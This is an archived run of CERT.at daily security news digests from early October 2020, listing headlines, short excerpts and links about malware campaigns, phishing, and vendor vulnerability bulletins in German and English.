===================== = End-of-Day report = ===================== Timeframe: Donnerstag 08-10-2020 18:00 − Freitag 09-10-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ Phishing kits as far as the eye can see, (Fri, Oct 9th) ∗∗∗ --------------------------------------------- If you've never delved too deep into the topic of phishing kits, you might quite reasonably expect that they would be the sort of tools, which are traded almost exclusively on dark web marketplaces. This is however not the case. --------------------------------------------- https://isc.sans.edu/diary/rss/26660 ∗∗∗ Firebase: Google Cloud’s Evil Twin - Excerpt ∗∗∗ --------------------------------------------- Firebase is the most popular developer tool that security has never heard of. We will bring its numerous flaws to light. --------------------------------------------- https://www.sans.org/blog/firebase-google-cloud-s-evil-twin-condensed ∗∗∗ BSI-Team räumt bei CHES-Challenge alle Preise ab ∗∗∗ --------------------------------------------- Vom 14. bis 18. September 2020 veranstaltete die International Association for Cryptologic Research (IACR) die Conference on Cryptographic Hardware and Embedded Systems (CHES). Die CHES ist die weltweit größte und renommierteste hardwarenahe Kryptographietagung. --------------------------------------------- https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/CHES-Challe… ∗∗∗ verbraucherclub.de: Warnung vor unseriösen Werbeschaltungen! ∗∗∗ --------------------------------------------- Haben Sie bereits von der Smartwatch „KoreTrak“ gehört, die ein Lebensretter für SeniorInnen sein soll? Oder von der LiveWave Antenna, die Ihnen gratis Fernsehen ins Wohnzimmer zaubert? Wenn ja, dann sind Sie wohl auf eine unseriöse Werbeschaltung von verbraucherclub.de gestoßen. --------------------------------------------- https://www.watchlist-internet.at/news/verbraucherclubde-warnung-vor-unseri… ∗∗∗ Microsoft Exchange CVE-2020-0688 Revisited -- in zwei Akten ∗∗∗ --------------------------------------------- Im April veröffentlichten wir einen Blogpost über Microsoft Exchange Server, die für die bereits im Februar 2020 gepatchte Lücke CVE-2020-0688 anfällig waren. --------------------------------------------- https://cert.at/de/aktuelles/2020/10/microsoft-exchange-cve-2020-0688-revis… ===================== = Vulnerabilities = ===================== ∗∗∗ Apples T2: Wenn der Sicherheitschip zum Keylogger wird ∗∗∗ --------------------------------------------- Eigentlich soll Apples T2-Chip für Sicherheit sorgen, ein Forscherteam könnte ihn jedoch in einen Keylogger umwandeln. --------------------------------------------- https://www.golem.de/news/apples-t2-wenn-der-sicherheitschip-zum-keylogger-… ∗∗∗ We Hacked Apple for 3 Months: Here’s What We Found ∗∗∗ --------------------------------------------- During our engagement, we found a variety of vulnerabilities in core portions of their infrastructure that would've allowed an attacker to fully compromise both customer and employee applications, launch a worm capable of automatically taking over a victims iCloud account, retrieve source code for internal Apple projects, [...] --------------------------------------------- https://samcurry.net/hacking-apple/ ∗∗∗ Credit card skimmer targets virtual conference platform ∗∗∗ --------------------------------------------- Criminals have gone after an online conference platform to steal credit card data from virtual attendees. --------------------------------------------- https://blog.malwarebytes.com/malwarebytes-news/2020/10/credit-card-skimmer… ∗∗∗ Security Bulletin: An XPath vulnerability may impact IBM Cúram Social Program Management (CVE-2020-4774) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-an-xpath-vulnerability-ma… ∗∗∗ Security Bulletin: IBM Cúram Social Program Management uses MD5 algorithm (CVE-2020-4778) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cram-social-program-m… ∗∗∗ Security Bulletin: A cross-site scripting (XSS) vulnerability may impact IBM Cúram Social Program Management (CVE-2020-4775) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-cross-site-scripting-xs… ∗∗∗ Security Bulletin: IBM Kenexa LCMS Premier On Premise – IBM SDK, Java Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-kenexa-lcms-premier-o… ∗∗∗ Security Bulletin: An improper input validation vulnerability may impact IBM Cúram Social Program Management (CVE-2020-4781) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-an-improper-input-validat… ∗∗∗ Security Bulletin: API Connect is vulnerable to denial of service via Kubernetes (CVE-2020-8557, CVE-2020-8559) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-vulnerable… ∗∗∗ Security Bulletin: Security vulnerabilities have been fixed in IBM Security Access Manager and IBM Security Verify Access (CVE-2020-4661, CVE-2020-4699, CVE-2020-4660) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: API Connect is vulnerable to denial of service (CVE-2020-16845) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-vulnerable… ∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM Integration Bus & IBM App Connect Enterprise V11 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Integration Bus and IBM App Connect Enterpise v11. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.10.2020
by Daily end-of-shift report 08 Oct '20

08 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 07-10-2020 18:00 − Donnerstag 08-10-2020 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner ===================== = News = ===================== ∗∗∗ SiteCheck Malware Report: September Summary ∗∗∗ --------------------------------------------- In September alone, a total of 17,138,086 website scans were performed using SiteCheck. Of those scans, 178,299 infected sites were detected. --------------------------------------------- https://blog.sucuri.net/2020/10/sitecheck-malware-report-september-summary.… ∗∗∗ Researchers Find Vulnerabilities in Microsoft Azure Cloud Service ∗∗∗ --------------------------------------------- Now according to the latest research, two security flaws in Microsoft's Azure App Services could have enabled a bad actor to carry out server-side request forgery (SSRF) attacks or execute arbitrary code and take over the administration server. ... Discovered by Paul Litvak of Intezer Labs, the flaws were reported to Microsoft in June, after which the company subsequently addressed them. --------------------------------------------- https://thehackernews.com/2020/10/microsoft-azure-vulnerability.html ===================== = Vulnerabilities = ===================== ∗∗∗ QNAP NAS: Neue Version der Helpdesk-App beseitigt zwei kritische Lücken ∗∗∗ --------------------------------------------- Die Helpdesk-App für Netzwerkspeicher von QNAP wies zwei Sicherheitslücken auf, über die Angreifer die Kontrolle über die Geräte hätten erlangen können. --------------------------------------------- https://heise.de/-4923916 ∗∗∗ Multiple Cross-Site Scripting Vulnerabilities in Confluence Marketplace Plugins ∗∗∗ --------------------------------------------- Multiple Confluence Plugins from different vendors are affected by stored cross-site scripting vulnerabilities which allow attackers to inject malicious JavaScript code into Confluence pages. PlantUML, Refined Toolkit for Confluence, Linking for Confluence, Countdown Timer, Server Status Business recommendation: Update to the latest versions of the plugins. --------------------------------------------- https://sec-consult.com/./en/blog/advisories/multiple-cross-site-scripting-… ∗∗∗ Vulnerability Exposes Over 4 Million Sites Using WPBakery ∗∗∗ --------------------------------------------- On July 27th, our Threat Intelligence team discovered a vulnerability in WPBakery, a WordPress plugin installed on over 4.3 million sites. This flaw made it possible for authenticated attackers with contributor-level or above permissions to inject malicious JavaScript in posts. [...] a final sufficient patch was released on September 24, 2020. We highly recommend updating to the latest version, 6.4.1 as of today, immediately. --------------------------------------------- https://www.wordfence.com/blog/2020/10/vulnerability-exposes-over-4-million… ∗∗∗ IBM Security Bulletins ∗∗∗ --------------------------------------------- IBM hat eine Reihe von Security Bulletins veröffentlicht: * https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… * https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… * https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… --------------------------------------------- https://www.ibm.com/blogs/psirt/ ∗∗∗ Sicherheitsupdates: Angreifer könnten Videoüberwachung von Cisco deaktivieren ∗∗∗ --------------------------------------------- Der Netzwerkausrüster Cisco hat wichtige Patches für unter anderem Überwachungskameras und die Online-Meeting-Software Webex veröffentlicht. Liste nach Bedrohungsgrad absteigend sortiert: * Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service * Webex Teams Client for Windows DLL Hijacking * Identity Services Engine Authorization Bypass * Industrial Network Director Denial of Service * Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak * Vision Dynamic Signage Director Missing Authentication * SD-WAN vManage Cross-Site Scripting * StarOS Privilege Escalation * Expressway Series and TelePresence Video Communication Server Denial of Service * Email Security Appliance URL Filtering Bypass * Nexus Data Broker Software Path Traversal * Firepower Management Center Cross-Site Scripting * Identity Services Engine Cross-Site Scripting * StarOS Privilege Escalation --------------------------------------------- https://heise.de/-4924026 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.10.2020
by Daily end-of-shift report 07 Oct '20

07 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 06-10-2020 18:00 − Mittwoch 07-10-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ Backdoor Shell Dropper Deploys CMS-Specific Malware ∗∗∗ --------------------------------------------- A large majority of the malware we find on compromised websites are backdoors that allow an attacker to maintain unauthorized access to the site and execute whatever commands they want. --------------------------------------------- https://blog.sucuri.net/2020/10/backdoor-shell-dropper-deploys-cms-specific… ∗∗∗ Alert (AA20-280A): Emotet Malware ∗∗∗ --------------------------------------------- Emotet—a sophisticated Trojan commonly functioning as a downloader or dropper of other malware—resurged in July 2020, after a dormant period that began in February. --------------------------------------------- https://us-cert.cisa.gov/ncas/alerts/aa20-280a ∗∗∗ New HEH botnet can wipe routers and IoT devices ∗∗∗ --------------------------------------------- The disk-wiping feature is present in the code but has not been used yet. --------------------------------------------- https://www.zdnet.com/article/new-heh-botnet-can-wipe-routers-and-iot-devic… ∗∗∗ Betrügerische Post-Mail verbreitet Schadsoftware ∗∗∗ --------------------------------------------- Derzeit werden betrügerische E-Mails im Namen der Post willkürlich an zahlreiche EmpfängerInnen versendet. Die Kriminellen drohen den Opfern mit einer Geldstrafe, da bestimmte Kosten noch nicht bezahlt wurden. --------------------------------------------- https://www.watchlist-internet.at/news/betruegerische-post-mail-verbreitet-… ===================== = Vulnerabilities = ===================== ∗∗∗ Enter the Vault: Authentication Issues in HashiCorp Vault ∗∗∗ --------------------------------------------- Posted by Felix Wilhelm, Project Zero: In this blog post I'll discuss two vulnerabilities in HashiCorp Vault and its integration with Amazon Web Services (AWS) and Google Cloud Platform (GCP). --------------------------------------------- https://googleprojectzero.blogspot.com/2020/10/enter-the-vault-auth-issues-… ∗∗∗ 90 days, 16 bugs, and an Azure Sphere Challenge ∗∗∗ --------------------------------------------- Cisco Talos reports 16 vulnerabilities in Microsoft Azure Spheres sponsored research challenge. --------------------------------------------- https://blog.talosintelligence.com/2020/10/Azure-Sphere-Challenge.html ∗∗∗ Security Bulletin: Security vulnerabilities in OpenSSH and OpenSSL shipped with IBM Security Access Manager Appliance (CVE-2018-15473, CVE-2019-1559) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Pak for Data – Node.js (CVE-2019-15606, CVE-2019-15604, CVE-2019-15605) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by kernel vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Apache commons beanutils 1.9.2 library vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM API Connect's Developer Portal is impacted by vulnerabilities in MySQL. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connects-develope… ∗∗∗ Security Bulletin: Liberty for Java for IBM Cloud is vulnerable to a denial of service (CVE-2020-4590) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-liberty-for-java-for-ibm-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an OpenSSL vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by Oracle MySQL vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Apache Commons vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Oracle MySQL vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.10.2020
by Daily end-of-shift report 06 Oct '20

06 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Montag 05-10-2020 18:00 − Dienstag 06-10-2020 18:00 Handler: Dimitri Robl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hacker group compromises mobile provider to steal credit cards ∗∗∗ --------------------------------------------- Credit card skimming group Fullz House has compromised and injected the website of US mobile virtual network operator (MVNO) Boom! Mobile with a credit card stealer script. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hacker-group-compromises-mob… ∗∗∗ Ransomware threat surge, Ryuk attacks about 20 orgs per week ∗∗∗ --------------------------------------------- Malware researchers monitoring ransomware threats noticed a sharp increase in these attacks over the past months compared to the first six months of 2020. --------------------------------------------- https://www.bleepingcomputer.com/news/security/ransomware-threat-surge-ryuk… ∗∗∗ Obfuscation and Repetition, (Mon, Oct 5th) ∗∗∗ --------------------------------------------- The obfuscated payload of a maldoc submitted by a reader can be quickly extracted with the "strings method" I explained in diary entry "Quickie: String Analysis is Still Useful". --------------------------------------------- https://isc.sans.edu/diary/rss/26648 ∗∗∗ Release the Kraken: Fileless APT attack abuses Windows Error Reporting service ∗∗∗ --------------------------------------------- We discovered a new attack that injected its payload—dubbed "Kraken" into the Windows Error Reporting (WER) service as a defense evasion mechanism. --------------------------------------------- https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuse… ∗∗∗ Betrug auf Amazon erkennen: So geht‘s ∗∗∗ --------------------------------------------- Auch auf Amazon können Sie auf betrügerische Angebote stoßen. Das Positive jedoch vorweg: Ein betrügerisches Angebot kann schnell entlarvt werden, indem Sie sich das Profil der Marketplace-HändlerInnen genauer ansehen. Werden Sie dort aufgefordert, sich vor einer Bestellung per E-Mail an den Verkäufer/ die Verkäuferin zu wenden, handelt es sich um Betrug! --------------------------------------------- https://www.watchlist-internet.at/news/betrug-auf-amazon-erkennen-so-gehts/ ∗∗∗ 5 steps to secure your connected devices ∗∗∗ --------------------------------------------- As we steadily adopt smart devices into our lives, we shouldn’t forget about keeping them secured and our data protected. --------------------------------------------- https://www.welivesecurity.com/2020/10/05/5-steps-secure-connected-devices/ ===================== = Vulnerabilities = ===================== ∗∗∗ Smart male chastity lock cock-up ∗∗∗ --------------------------------------------- TL;DR Smart Bluetooth male chastity lock, designed for user to give remote control to a trusted 3rd party using mobile app [...] --------------------------------------------- https://www.pentestpartners.com/security-blog/smart-male-chastity-lock-cock… ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Multiple Jackson-Databind CVEs – February 2020 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: IBM DataPower Gateway is potentially vulnerable to a Denial of Service (CVE-2020-14147) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-datapower-gateway-is-… ∗∗∗ Security Bulletin: IBM DataPower Gateway can expose remote credentials to local users (CVE-2020-4528) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-datapower-gateway-can… ∗∗∗ Security Bulletin: Multiple Security Vulnerabilities fixed in IBM WebSphere Liberty as shipped in IBM Security Access Manager ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: Cross-Site Scripting (XSS) fixed in IBM Security Access Manager 9.0.7.2 (CVE-2019-4725) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-xss-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Oracle MySQL vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM DataPower Gateway may allow a potential DoS when importing malicious ZIP files (CVE-2019-13232) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-datapower-gateway-may… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by Python vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Performance Tester ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Service Tester ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ October 2020 ∗∗∗ --------------------------------------------- https://source.android.com/security/bulletin/2020-10-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.10.2020
by Daily end-of-shift report 05 Oct '20

05 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 02-10-2020 18:00 − Montag 05-10-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ MosaicRegressor: Lurking in the Shadows of UEFI ∗∗∗ --------------------------------------------- We found a compromised UEFI firmware image that contained a malicious implant. To the best of our knowledge, this is the second known public case where malicious UEFI firmware in use by a threat actor was found in the wild. --------------------------------------------- https://securelist.com/mosaicregressor/98849/ ∗∗∗ Egregor Ransomware Threatens ‘Mass-Media’ Release of Corporate Data ∗∗∗ --------------------------------------------- The newly discovered ransomware is hitting companies worldwide, including the GEFCO global logistics company. --------------------------------------------- https://threatpost.com/egregor-ransomware-mass-media-corporate-data/159816/ ∗∗∗ Scanning for SOHO Routers, (Sat, Oct 3rd) ∗∗∗ --------------------------------------------- In the past 30 days lots of scanning activity looking for small office and home office (SOHO) routers targeting Netgear. --------------------------------------------- https://isc.sans.edu/diary/rss/26638 ∗∗∗ Raccine-Tool soll Schattenkopien von Windows vor Ransomware schützen ∗∗∗ --------------------------------------------- Erpressungstrojaner verschlüsseln Dateien und löschen Daten, die Opfer zur Wiederherstellung nutzen könnten. Das Gratis-Tool Raccine will Hilfe anbieten. --------------------------------------------- https://heise.de/-4920206 ∗∗∗ Attacks Aimed at Disrupting the Trickbot Botnet ∗∗∗ --------------------------------------------- Over the past 10 days, someone has been launching a series of coordinated attacks designed to disrupt Trickbot, an enormous collection of more than two million malware-infected Windows PCs that are constantly being harvested for financial data and are often used as the entry point for deploying ransomware within compromised organizations. --------------------------------------------- https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbo… ∗∗∗ Black-T: New Cryptojacking Variant from TeamTnT ∗∗∗ --------------------------------------------- Code within the Black-T malware sample gives evidence of a shift in tactics, techniques and procedures for TeamTnT operations. --------------------------------------------- https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/ ∗∗∗ Shodan Verified Vulns 2020-10-05 ∗∗∗ --------------------------------------------- Wie in unserem Blogpost vom September angekündigt, wollen wir monatlich einen Überblick zu Shodans "Verified Vulnerablilities" in Österreich bieten. --------------------------------------------- https://cert.at/de/aktuelles/2020/10/shodan-verified-vulns-2020-10-05 ===================== = Vulnerabilities = ===================== ∗∗∗ Tenda Router Zero-Days Emerge in Spyware Botnet Campaign ∗∗∗ --------------------------------------------- A variant of the Mirai botnet, called Ttint, has added espionage capabilities to complement its denial-of-service functions. --------------------------------------------- https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/ ∗∗∗ Dringend patchen: Rund eine viertel Million Exchange-Server angreifbar ∗∗∗ --------------------------------------------- Kriminelle nutzen eine Lücke in Microsoft Exchange, um Server zu übernehmen. Dabei gibt es seit Februar einen Patch. --------------------------------------------- https://heise.de/-4920095 ∗∗∗ Security Bulletin: IBM Cloud Pak for Integration Operators affected by multiple vulnerabilities ∗∗∗ --------------------------------------------- Operators for BM Cloud Pak for Integration (CP4I) version 2020.2 are affected by vulnerabilities in Go prior to Go version 1.14.7. --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-integra… ∗∗∗ Multiple critical vulnerabilities in RocketLinx Series ∗∗∗ --------------------------------------------- https://sec-consult.com/en/blog/advisories/multiple-critical-vulnerabilitie… ∗∗∗ WAGO: XSS vulnerability in Web-UI in WAGO 750-88X and WAGO 750-89X ∗∗∗ --------------------------------------------- https://cert.vde.com/de-de/advisories/vde-2020-029 ∗∗∗ WAGO: Vulnerability in web-based authentication in WAGO 750-8XX Version <= FW07 ∗∗∗ --------------------------------------------- https://cert.vde.com/de-de/advisories/vde-2020-027 ∗∗∗ WAGO: Authentication Bypass Vulnerability in WAGO 750-36X and WAGO 750-8XX Versions <= FW03 ∗∗∗ --------------------------------------------- https://cert.vde.com/de-de/advisories/vde-2020-028 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 02.10.2020
by Daily end-of-shift report 02 Oct '20

02 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 01-10-2020 18:00 − Freitag 02-10-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Sichere Software entwickeln mit OWASP SAMM ∗∗∗ --------------------------------------------- Sicherheit ist im gesamten Entwicklungsprozess wichtig, und OWASP SAMM bietet ein flexibles Rahmenwerk zur Umsetzung. --------------------------------------------- https://heise.de/-4918292 ∗∗∗ Common Ways Attackers Are Stealing Credentials ∗∗∗ --------------------------------------------- A few weeks ago, we reviewed some of the worst website hacks we’ve ever seen. Every one of them started with poor password choices and escalated into a disastrous event for the site owner. Strong passwords and good password hygiene are often the first line of defense. --------------------------------------------- https://www.wordfence.com/blog/2020/10/common-ways-attackers-are-stealing-c… ∗∗∗ Massenhaft gefälschte Post-Mails: So entlarven Sie den Betrug! ∗∗∗ --------------------------------------------- Derzeit versenden BetrügerInnen zahlreiche E-Mails im Namen der Post. Die Kriminellen täuschen darin vor, dass Versandkosten fehlen und ein Paket daher nicht zugestellt werden könne. Tatsächlich handelt es sich um einen sogenannten „Phishing-Versuch“. Die Kriminellen versuchen so an Ihre Zugangsdaten zu kommen. Wir erklären Ihnen, wie Sie den Betrug entlarven! --------------------------------------------- https://www.watchlist-internet.at/news/massenhaft-gefaelschte-post-mails-so… ∗∗∗ New service checks if your email was used in Emotet attacks ∗∗∗ --------------------------------------------- A new service has been launched that allows you to check if an email domain or address was in an Emotet spam campaign. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-service-checks-if-your-e… ∗∗∗ QR Codes: A Sneaky Security Threat ∗∗∗ --------------------------------------------- What to watch out for, and how to protect yourself from malicious versions of these mobile shortcuts. --------------------------------------------- https://threatpost.com/qr-codes-sneaky-security-threat/159757/ ∗∗∗ Serious Security: Phishing without links - when phishers bring along their own web pages ∗∗∗ --------------------------------------------- How do you "check the URL before you click" if the web page youre visiting is already on your own computer? --------------------------------------------- https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-witho… ∗∗∗ GFX Xsender Hack Tool: A Spam Mailer ∗∗∗ --------------------------------------------- PHP hack tools are created and used by attackers to help automate frequent or tedious tasks. During a recent investigation, we came across a hack tool used to simplify the process of sending predefined HTML emails to a list of email addresses. The tool runs on top of PHPMailer’s library, which handles the connection and sending of the malicious emails. The hack tool also grants the ability to authenticate to an email address on a remote server. --------------------------------------------- https://blog.sucuri.net/2020/10/gfx-xsender-hack-tool-a-spam-mailer.html ∗∗∗ [SANS ISC] Analysis of a Phishing Kit ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: “Analysis of a Phishing Kit“: Sometimes, attackers make mistakes and allow security researchers to access interesting resources. This time, it’s another phishing kit that was left in the wild on the compromised server. --------------------------------------------- https://blog.rootshell.be/2020/10/02/sans-isc-analysis-of-a-phishing-kit/ ===================== = Vulnerabilities = ===================== ∗∗∗ macOS 10.14.6 Supplemental Update ∗∗∗ --------------------------------------------- macOS 10.14.6 Supplemental Update for macOS Mojave includes the security content of Safari 14.0. --------------------------------------------- https://support.apple.com/kb/HT211872 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (jruby and ruby2.3), Fedora (crun, pdns, and podman), openSUSE (go1.14 and kernel), Oracle (qemu-kvm and virt:ol), Red Hat (qemu-kvm-ma and thunderbird), SUSE (nodejs10, nodejs12, perl-DBI, permissions, and xen), and Ubuntu (ntp). --------------------------------------------- https://lwn.net/Articles/833343/ ∗∗∗ Security Bulletin: Vulnerabilities in Ruby on Rails affect IBM License Metric Tool v9. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ruby-o… ∗∗∗ Security Bulletin: A vulnerability in Ruby on Rails affects IBM License Metric Tool v9 (CVE-2020-8166). ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ruby-o… ∗∗∗ Security Bulletin: A vulnerability in Ruby on Rails affects IBM License Metric Tool v9 (CVE-2020-8164). ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ruby-o… ∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Pak for Data – Node.js (CVE-2020-8203) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to CVE-2019-11324 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: Multiple IBM DB2 Server Security Vulnerabilities Affect IBM Emptoris Strategic Supply Management Platform ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-ibm-db2-server-s… ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Authentication Bypass (CVE-2020-4493) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: Vulnerability in Apache Commons Codec affects IBM Cúram Social Program Management (177835) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-c… ∗∗∗ Security Bulletin: Multiple IBM DB2 Server Security Vulnerabilities Affect IBM Emptoris Contract Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-ibm-db2-server-s… ∗∗∗ Security Bulletin: Vulnerability in WebSphere Application Server Liberty affect IBM Operations Analytics – Log Analysis (CVE-2020-4590) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-webspher… ∗∗∗ Multiple Vulnerabilities in SevOne Network Management System (NMS) ∗∗∗ --------------------------------------------- https://sec-consult.com/./en/blog/advisories/multiple-vulnerabilities-in-se… ∗∗∗ PHP: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0949 ∗∗∗ Trend Micro AntiVirus for Mac: Schwachstelle ermöglicht Privilegieneskalation ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0948 ∗∗∗ Bitdefender Produkte: Schwachstelle ermöglicht Denial of Service ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0947 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 01.10.2020
by Daily end-of-shift report 01 Oct '20

01 Oct '20

